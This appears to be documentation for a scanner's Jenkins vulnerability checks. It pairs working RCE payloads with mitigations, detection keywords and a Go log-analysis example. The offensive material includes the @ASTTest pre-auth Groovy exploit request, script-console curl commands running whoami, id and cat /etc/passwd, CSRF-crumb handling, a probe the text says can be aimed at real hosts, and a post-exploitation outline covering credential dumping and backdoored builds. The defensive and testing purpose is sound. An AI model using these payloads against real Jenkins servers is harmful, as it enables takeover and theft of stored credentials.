
Overview

Jenkins is a popular open-source automation server used for CI/CD pipelines. scan4all includes POCs for multiple Jenkins vulnerabilities that allow remote code execution and unauthorized access.
Jenkins servers often have access to production environments, source code repositories, and credentials. Compromise can lead to supply chain attacks.

Supported Vulnerabilities

CVE-2016-0792 - XStream Deserialization RCE

CVE-2016-0792

Type: Remote Code Execution (XStream deserialization)
Affected Versions: Jenkins 1.649 and earlier, LTS 1.642.1 and earlier (fixed in 1.650 / LTS 1.642.2)
Discovery Date: February 2016
Description: Several Jenkins API endpoints deserialized attacker-supplied XML with XStream, which allowed authenticated users to execute arbitrary code on the Jenkins controller. The POC checks whether the target is exposed to this issue. Source: pocs_go/jenkins/CVE_2016_0792.go

CVE-2018-1000110 - User Enumeration

Type: User Enumeration
Affected Versions: Jenkins 2.106 and earlier, LTS 2.89.3 and earlier
Discovery Date: February 2018
CVSS Score: 5.3 (Medium)
Description: The Jenkins search function could be used to list user accounts by users who were not permitted to see them. A list of valid usernames is the starting point for password spraying, targeted phishing and other social engineering. Impact:
  • Username enumeration
  • Information disclosure
  • Reconnaissance for further attacks
Detection Method:
# People pages list known users when anonymous read is allowed
curl http://jenkins/asynchPeople/
curl http://jenkins/securityRealm/user/
# The search function the CVE concerns
curl 'http://jenkins/search/?q=a'
Source: pocs_go/jenkins/CVE_2018_1000110.go

CVE-2018-1000861 - Stapler Routing Bypass (pre-auth Groovy RCE chain)

CVE-2018-1000861

Type: Authorization bypass leading to Remote Code Execution
Affected Versions: Jenkins 2.153 and earlier, LTS 2.138.3 and earlier
Discovery Date: December 2018
CVSS Score: 9.8 (Critical)
Description: The Stapler web framework that routes Jenkins URLs let attackers invoke Java methods that were never meant to be web-reachable by requesting crafted URLs. In particular, an unauthenticated user could walk the route /securityRealm/user/<name>/descriptorByName/... and reach the Script Security plugin's checkScript form validator, which compiles attacker-supplied Groovy. On its own the routing bug is only an ACL bypass; combined with the compile-time sandbox bypass tracked as CVE-2019-1003000 (the @ASTTest payload below) it yields code execution without credentials. Technical Details:
  • Requirement: none on a vulnerable core; on a patched core the checkScript endpoint requires Overall/Read
  • Component: Jenkins core (Stapler routing) together with the Script Security Plugin
  • Attack Vector: Groovy AST (Abstract Syntax Tree) transformation executed while the script is compiled, before the sandbox applies
  • Impact: Complete server compromise
Exploitation Method:
  1. Check for Jenkins: verify the X-Jenkins-Session header is present
  2. Send AST test payload: POST a Groovy script carrying an @ASTTest annotation to the checkScript endpoint
  3. Execute command: the annotation body calls Runtime.exec() during compilation
  4. Verify execution: the PoC runs a command that does not exist ("vtest"), so a "No such file or directory" error proves the exec call was attempted
POC Payloads:
import groovy.transform.*
@ASTTest(value={assert java.lang.Runtime.getRuntime().exec("vtest")})
class Person{}
Detection Request:
# Check vulnerability ("vtest" is not a real command, so nothing runs on success)
curl -X POST "http://jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=import+groovy.transform.*%0a%40ASTTest(value%3d%7bassert+java.lang.Runtime.getRuntime().exec(%22vtest%22)%7d)%0aclass+Person%7b%7d"
Indicators of Vulnerability:
  • HTTP 500 response
  • Error message: "No such file or directory" (or "Cannot run program "vtest"")
  • Stack trace mentioning @ASTTest
A patched core no longer routes the request to checkScript, and a patched Script Security plugin rejects the annotation instead of running it, so neither string appears.
Source: pocs_go/jenkins/CVE_2018_1000861.go
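The probe described in this section, as an added example in Go (not scan4all's own code): it fingerprints the host through the X-Jenkins header, sends the checkScript request with the @ASTTest payload from the curl PoC, and decides from the response body whether the exec call was attempted. The function names, the Result type and NewMockJenkins (a constructed stand-in that answers like an unpatched and a patched controller so the code runs offline) are this example's own assumptions. The payload is the compile-time sandbox bypass tracked as CVE-2019-1003000; this CVE is what makes the endpoint reachable without credentials.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
	"time"
)

// astTestPayload is the page's compile-time probe. @ASTTest runs its closure
// while the script is compiled, before the sandbox can intercept anything.
// "vtest" is not a real command, so a vulnerable server reports the failed
// exec attempt instead of a clean compile.
const astTestPayload = "import groovy.transform.*\n" +
	"@ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"vtest\")})\n" +
	"class Person{}"

// checkScriptPath is the Script Security form validator reached through the
// Stapler route that CVE-2018-1000861 exposes to anonymous users.
const checkScriptPath = "/securityRealm/user/admin/descriptorByName/" +
	"org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript"

// Result summarises one probe of a Jenkins base URL.
type Result struct {
	IsJenkins  bool   // X-Jenkins header observed on /login
	Version    string // value of X-Jenkins, if any
	Status     int    // HTTP status of the checkScript response
	Vulnerable bool   // response proves Runtime.exec ran at compile time
}

// CheckASTTest fingerprints the host, then sends the checkScript request
// from the curl PoC and looks for the exec failure in the response body.
func CheckASTTest(base string) (Result, error) {
	client := &http.Client{Timeout: 10 * time.Second}
	var res Result

	resp, err := client.Get(base + "/login")
	if err != nil {
		return res, err
	}
	resp.Body.Close()
	res.Version = resp.Header.Get("X-Jenkins")
	res.IsJenkins = res.Version != ""

	q := url.Values{"sandbox": {"true"}, "value": {astTestPayload}}
	req, err := http.NewRequest(http.MethodPost, base+checkScriptPath+"?"+q.Encode(), nil)
	if err != nil {
		return res, err
	}
	resp, err = client.Do(req)
	if err != nil {
		return res, err
	}
	defer resp.Body.Close()
	body, _ := io.ReadAll(io.LimitReader(resp.Body, 1<<20))
	res.Status = resp.StatusCode
	// Either string shows the JVM tried to run "vtest". A patched core never
	// routes the request here and a patched Script Security plugin rejects
	// the annotation, so neither string appears.
	s := string(body)
	res.Vulnerable = strings.Contains(s, "No such file or directory") ||
		strings.Contains(s, `Cannot run program "vtest"`)
	return res, nil
}

// NewMockJenkins is a constructed stand-in for a Jenkins controller so the
// probe can be exercised offline. vulnerable=true imitates an unpatched
// server; false imitates a core that no longer routes the request.
func NewMockJenkins(vulnerable bool) *httptest.Server {
	mux := http.NewServeMux()
	mux.HandleFunc("/login", func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("X-Jenkins", "2.138.3")
		fmt.Fprint(w, "<title>Jenkins</title>")
	})
	mux.HandleFunc(checkScriptPath, func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("X-Jenkins", "2.138.3")
		if !vulnerable {
			http.NotFound(w, r)
			return
		}
		if strings.Contains(r.URL.Query().Get("value"), "@ASTTest") {
			w.WriteHeader(http.StatusInternalServerError)
			fmt.Fprint(w, `java.io.IOException: Cannot run program "vtest": error=2, No such file or directory`)
			return
		}
		fmt.Fprint(w, "<div/>") // clean compile, nothing executed
	})
	return httptest.NewServer(mux)
}

func main() {
	for _, v := range []bool{true, false} {
		srv := NewMockJenkins(v)
		res, err := CheckASTTest(srv.URL)
		srv.Close()
		fmt.Printf("mock vulnerable=%v -> %+v err=%v\n", v, res, err)
	}
}
```

Point CheckASTTest at a real base URL (for example http://jenkins.example.com:8080) to use it against a target; the body strings, not the status code, are the reliable signal, since a patched plugin still answers the form-validation request with a normal compile result.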

CVE-2019-1003000 - Script Security Sandbox Bypass RCE

CVE-2019-1003000

Type: Remote Code Execution (sandbox bypass)
Affected Versions: Script Security Plugin 1.49 and earlier (the same flaw in Pipeline: Groovy Plugin 2.61 and earlier is tracked as CVE-2019-1003001)
Discovery Date: January 2019
CVSS Score: 8.8 (High)
Description: The Script Security sandbox intercepts method calls while a Groovy script runs, but it did not cover code that executes while the script is being compiled. Groovy AST transformation annotations such as @ASTTest and @Grab run at compile time, so a user with Overall/Read who could submit a script to any endpoint that compiles it (for example the checkScript form validation used above) could execute arbitrary code on the Jenkins controller JVM. Technical Details:
  • Component: Script Security Plugin ≤ 1.49
  • Component: Pipeline: Groovy Plugin ≤ 2.61 (CVE-2019-1003001)
  • Attack Vector: compile-time AST transformation (@ASTTest, @Grab) that runs before the sandbox checks
  • Requirement: authenticated user with Overall/Read (no credentials at all when chained with CVE-2018-1000861 on an unpatched core)
Vulnerable Components:
Component                 Vulnerable Version
Script Security Plugin    ≤ 1.49
Pipeline: Groovy Plugin   ≤ 2.61
Exploitation: The @ASTTest payload shown under CVE-2018-1000861 is this bypass; CVE-2018-1000861 only makes the endpoint reachable without credentials. The fix rejects AST-transforming annotations in sandboxed scripts, so the same payload fails to compile on Script Security 1.50 and later.
Mitigation:
  1. Update Script Security: update Script Security Plugin to 1.50 or later
  2. Update Pipeline: Groovy: update Pipeline: Groovy Plugin to 2.62 or later
  3. Review scripts: audit all Groovy scripts for malicious code
  4. Restrict permissions: limit who can create and modify scripts
Source: pocs_go/jenkins/CVE_2019_1003000.go

Unauthorized Groovy Script Execution

Unauthorized Groovy RCE

Type: Unauthorized Remote Code Execution
Affected Versions: Various (misconfigured)
Issue: Missing authentication on script console
Description: Some Jenkins installations are configured so that the Groovy script console is reachable without credentials. That is direct remote code execution on the Jenkins controller with no software vulnerability required. Common Misconfigurations:
  1. No Authorization Strategy
    Jenkins > Manage Jenkins > Configure Global Security
    Authorization: "Anyone can do anything"
  2. Public Script Console
    /script endpoint accessible without authentication
    /scriptText endpoint exposed
  3. Anonymous Read+Execute
    • Anonymous user holds Overall/Administer (the permission the script console requires)
    • Matrix-based security misconfigured
Detection:
# Check if the script console is accessible (200 with the form, rather than a redirect to /login or a 403)
curl -i http://jenkins/script
curl -i http://jenkins/scriptText

# Check if job creation is allowed
curl -i http://jenkins/createItem

# Try to access the manage page
curl -i http://jenkins/manage
Exploitation:
# Execute Groovy script
curl -X POST http://jenkins/scriptText \
  -d "script=println('whoami'.execute().text)"

# Alternative endpoint
curl -X POST http://jenkins/script \
  -d "script=println('id'.execute().text)" \
  -d "Submit=Run"
With CSRF protection enabled (the default on current Jenkins) a POST without a crumb fails with HTTP 403 "No valid crumb was included in the request" even when anonymous users may run scripts. Fetch a crumb from /crumbIssuer/api/json and send it in the header named by crumbRequestField (normally Jenkins-Crumb); since Jenkins 2.176.2 the crumb is bound to the session, so keep the cookie jar between the two requests (curl -c jar -b jar). A 403 from the crumb check therefore does not prove the console is protected.
Common Groovy Payloads:
println "whoami".execute().text
println "cat /etc/passwd".execute().text
Source: pocs_go/jenkins/Unauthorized.go
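The unauthenticated console check above, as an added Go example that is not part of scan4all: it fetches a crumb when an issuer exists, posts a harmless marker script to /scriptText without credentials, and treats only an echoed marker as proof of execution, so a 403 from the crumb check is not mistaken for a locked-down console. The marker string, the function names and NewMockConsole (a constructed stand-in that imitates "Anyone can do anything" and CSRF protection so the code runs offline) are this example's own assumptions.

```go
package main

import (
	"encoding/json"
	"fmt"
	"io"
	"net/http"
	"net/http/cookiejar"
	"net/http/httptest"
	"net/url"
	"strings"
	"time"
)

// fetchCrumb asks /crumbIssuer/api/json for a CSRF token. Jenkins binds the
// crumb to the session, so the caller's client must keep cookies. Returns
// empty strings when the issuer is absent or refuses anonymous callers.
func fetchCrumb(c *http.Client, base string) (field, value string) {
	resp, err := c.Get(base + "/crumbIssuer/api/json")
	if err != nil {
		return "", ""
	}
	defer resp.Body.Close()
	if resp.StatusCode != http.StatusOK {
		return "", ""
	}
	var v struct {
		Field string `json:"crumbRequestField"`
		Crumb string `json:"crumb"`
	}
	if err := json.NewDecoder(resp.Body).Decode(&v); err != nil {
		return "", ""
	}
	return v.Field, v.Crumb
}

// ProbeScriptConsole posts a marker-printing script to /scriptText with no
// credentials. Only a 200 whose body echoes the marker counts as execution;
// a redirect to /login or a 403 from the authorization strategy does not.
func ProbeScriptConsole(base string) (vulnerable bool, status int, err error) {
	jar, _ := cookiejar.New(nil)
	c := &http.Client{Timeout: 10 * time.Second, Jar: jar,
		CheckRedirect: func(*http.Request, []*http.Request) error { return http.ErrUseLastResponse }}
	const marker = "jenkins-console-probe-7f3a" // constructed marker, runs no command
	form := url.Values{"script": {fmt.Sprintf("println(%q)", marker)}}
	req, err := http.NewRequest(http.MethodPost, base+"/scriptText", strings.NewReader(form.Encode()))
	if err != nil {
		return false, 0, err
	}
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	if f, v := fetchCrumb(c, base); f != "" {
		req.Header.Set(f, v)
	}
	resp, err := c.Do(req)
	if err != nil {
		return false, 0, err
	}
	defer resp.Body.Close()
	body, _ := io.ReadAll(io.LimitReader(resp.Body, 1<<20))
	return resp.StatusCode == http.StatusOK && strings.Contains(string(body), marker), resp.StatusCode, nil
}

// NewMockConsole is a constructed stand-in for a Jenkins controller.
// anonymousExec=true imitates "Anyone can do anything"; csrf=true imitates
// CSRF protection, which rejects POSTs lacking the crumb it issued.
func NewMockConsole(anonymousExec, csrf bool) *httptest.Server {
	const crumb = "0123456789abcdef"
	mux := http.NewServeMux()
	mux.HandleFunc("/crumbIssuer/api/json", func(w http.ResponseWriter, r *http.Request) {
		if !csrf {
			http.NotFound(w, r)
			return
		}
		http.SetCookie(w, &http.Cookie{Name: "JSESSIONID", Value: "s1"})
		fmt.Fprintf(w, `{"crumbRequestField":"Jenkins-Crumb","crumb":%q}`, crumb)
	})
	mux.HandleFunc("/scriptText", func(w http.ResponseWriter, r *http.Request) {
		if csrf && r.Header.Get("Jenkins-Crumb") != crumb {
			http.Error(w, "No valid crumb was included in the request", http.StatusForbidden)
			return
		}
		if !anonymousExec {
			http.Error(w, "anonymous is missing the Overall/Administer permission", http.StatusForbidden)
			return
		}
		// Imitate the console running println("..."): echo the argument.
		s := r.FormValue("script")
		if i := strings.Index(s, `println("`); i >= 0 {
			if j := strings.Index(s[i+9:], `")`); j >= 0 {
				fmt.Fprintln(w, s[i+9:i+9+j])
			}
		}
	})
	return httptest.NewServer(mux)
}

func main() {
	for _, tc := range [][2]bool{{true, true}, {true, false}, {false, true}} {
		srv := NewMockConsole(tc[0], tc[1])
		v, st, err := ProbeScriptConsole(srv.URL)
		srv.Close()
		fmt.Printf("anonymousExec=%v csrf=%v -> vulnerable=%v status=%d err=%v\n", tc[0], tc[1], v, st, err)
	}
}
```

The marker approach keeps the probe harmless: nothing is executed on the target beyond printing a string, yet the echoed body is unambiguous evidence that anonymous Groovy ran on the controller.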

Usage

Scanning Jenkins Servers

# Scan a Jenkins server
scan4all -h http://jenkins.example.com

# Scan with explicit POC testing
scan4all -h http://jenkins.example.com:8080 -poc

# Test specific Jenkins CVE
scan4all -h http://jenkins.example.com -poc CVE-2018-1000861

Common Jenkins Ports

  • 8080 - Default HTTP port
  • 8443 - Default HTTPS port
  • 50000 - Default JNLP agent port

Identifying Jenkins

HTTP Headers:
X-Jenkins: 2.x.x
X-Jenkins-Session: xxxxxxxx
X-Hudson: 1.395
Common Endpoints:
/jenkins/
/ci/
/script
/login
/view/All/builds
/api/json
Response Body:
<title>Dashboard [Jenkins]</title>
<meta name="ROBOTS" content="INDEX,NOFOLLOW">

Mitigation

General Jenkins Security

  1. Enable authentication: configure a proper security realm (LDAP, SSO, etc.)
  2. Configure authorization: use a matrix-based or project-based authorization strategy and grant the anonymous user nothing
  3. Update Jenkins: keep Jenkins core and all plugins up to date
  4. Secure the script console: restrict script console access to administrators only (it requires Overall/Administer)
  5. Network isolation: place Jenkins behind a VPN or restrict access by source IP
  6. Monitor activity: enable and review audit logs regularly

Secure Configuration Example

Disable Anonymous Access (run once from the script console, or drop it into init.groovy.d)
import jenkins.model.Jenkins
import hudson.security.*

def instance = Jenkins.get()

// Enable security: Jenkins' own user database, with self-signup disabled
def realm = new HudsonPrivateSecurityRealm(false)
instance.setSecurityRealm(realm)

// Set authorization strategy: any logged-in user has full control and the
// anonymous user gets nothing, not even read. Use a matrix strategy when
// different users need different rights.
def strategy = new FullControlOnceLoggedInAuthorizationStrategy()
strategy.setAllowAnonymousRead(false)
instance.setAuthorizationStrategy(strategy)

instance.save()

Plugin Security

Plugin              Minimum Safe Version      Vulnerability
Script Security     1.50+                     CVE-2019-1003000
Pipeline: Groovy    2.62+                     CVE-2019-1003001 (same flaw as CVE-2019-1003000)
Jenkins Core        2.154+, LTS 2.138.4+      CVE-2018-1000861

Detection Indicators

Network Indicators

Vulnerable Endpoints:
/script
/scriptText
/securityRealm/user/admin/descriptorByName/
/asynchPeople/
Suspicious Requests:
  • POST to /script or /scriptText
  • Groovy code in request bodies
  • @ASTTest in parameters
  • execute(), Runtime.exec() in payloads

Log Patterns

GroovyScript.evaluate
SecureGroovyScript
@ASTTest
java.lang.Runtime.exec
ProcessBuilder
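An added Go example, not from the page's project, that applies the request-side indicators above to a constructed combined-format access log from a reverse proxy in front of Jenkins: it flags POSTs to the script console, hits on the checkScript form validator, people-page enumeration, and the Groovy execution keywords once the query string is URL-decoded. The function names and the sample lines are this example's own; request bodies are not in access logs, so keyword matching only sees payloads carried in the URL (as the checkScript PoC is), and body-level detection needs a WAF or proxy that logs bodies.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Finding is one log line that matched at least one indicator.
type Finding struct {
	Line       int      // 1-based line number in the input
	Client     string   // source address
	Indicators []string // matched indicator names
}

// combinedLog matches the start of a "combined" access-log line:
// client, ident, user, timestamp, request line, status.
var combinedLog = regexp.MustCompile(`^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})`)

// groovyKeywords are the page's payload and log patterns, looked for in the
// URL-decoded query string.
var groovyKeywords = []string{"@ASTTest", "@Grab", "Runtime.getRuntime().exec", "ProcessBuilder", ".execute()"}

// Classify returns the indicator names that apply to one request.
func Classify(method, target string) []string {
	path, query := target, ""
	if i := strings.IndexByte(target, '?'); i >= 0 {
		path, query = target[:i], target[i+1:]
	}
	decoded, err := url.QueryUnescape(query)
	if err != nil {
		decoded = query // keep raw text if the encoding is malformed
	}
	var hits []string
	if method == "POST" && (path == "/script" || path == "/scriptText") {
		hits = append(hits, "script-console-post")
	}
	if strings.Contains(path, "/descriptorByName/") && strings.HasSuffix(path, "/checkScript") {
		hits = append(hits, "checkScript-form-validation")
	}
	if strings.HasPrefix(path, "/asynchPeople") {
		hits = append(hits, "user-enumeration")
	}
	for _, kw := range groovyKeywords {
		if strings.Contains(decoded, kw) {
			hits = append(hits, "groovy-exec:"+kw)
		}
	}
	return hits
}

// ScanLog runs Classify over every parsable line and keeps the matches.
func ScanLog(lines []string) []Finding {
	var out []Finding
	for n, line := range lines {
		m := combinedLog.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		if hits := Classify(m[3], m[4]); len(hits) > 0 {
			out = append(out, Finding{Line: n + 1, Client: m[1], Indicators: hits})
		}
	}
	return out
}

// SampleLog is constructed for this example: the page's checkScript PoC,
// an anonymous /scriptText post, ordinary traffic, and a people-page read.
var SampleLog = []string{
	`10.0.0.5 - - [12/Jan/2024:10:15:01 +0000] "GET /login HTTP/1.1" 200 3102 "-" "Mozilla/5.0"`,
	`10.0.0.5 - - [12/Jan/2024:10:15:03 +0000] "POST /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=import+groovy.transform.*%0a%40ASTTest(value%3d%7bassert+java.lang.Runtime.getRuntime().exec(%22vtest%22)%7d)%0aclass+Person%7b%7d HTTP/1.1" 500 2210 "-" "curl/8.1.2"`,
	`10.0.0.9 - - [12/Jan/2024:10:16:10 +0000] "POST /scriptText HTTP/1.1" 200 45 "-" "python-requests/2.31"`,
	`10.0.0.12 - alice [12/Jan/2024:10:17:00 +0000] "GET /job/build-api/lastBuild/console HTTP/1.1" 200 9811 "-" "Mozilla/5.0"`,
	`10.0.0.5 - - [12/Jan/2024:10:17:30 +0000] "GET /asynchPeople/ HTTP/1.1" 200 7730 "-" "curl/8.1.2"`,
}

func main() {
	for _, f := range ScanLog(SampleLog) {
		fmt.Printf("line %d from %s: %s\n", f.Line, f.Client, strings.Join(f.Indicators, ", "))
	}
}
```

A GET of /script is only the console form and is deliberately not flagged; the execution is the POST. Correlating the findings by client (10.0.0.5 above first runs the PoC and then enumerates users) is what turns single indicators into an incident.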

Source Code Location

pocs_go/jenkins/
├── CVE_2016_0792.go
├── CVE_2016_0792_test.go
├── CVE_2018_1000110.go
├── CVE_2018_1000861.go
├── CVE_2019_1003000.go
└── Unauthorized.go

Real-World Impact

Jenkins servers commonly have:
  • Access to production servers via SSH keys
  • Cloud provider credentials (AWS, Azure, GCP)
  • Source code repository credentials
  • Database connection strings
  • API keys and secrets
  • Certificate private keys
Compromise of Jenkins can lead to complete infrastructure takeover.

Post-Exploitation

Once Jenkins is compromised, attackers typically:
  1. Extract Credentials
    // Dump all stored credentials
    def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(...)
    
  2. Modify Build Pipelines
    • Inject malicious code into builds
    • Create supply chain attacks
    • Backdoor deployed applications
  3. Lateral Movement
    • Use stored SSH keys
    • Access connected systems
    • Pivot to internal network
  4. Persistence
    • Create new admin users
    • Modify startup scripts
    • Install malicious plugins

References

Jenkins security requires ongoing attention. Regularly review security settings, update plugins, and audit user permissions.
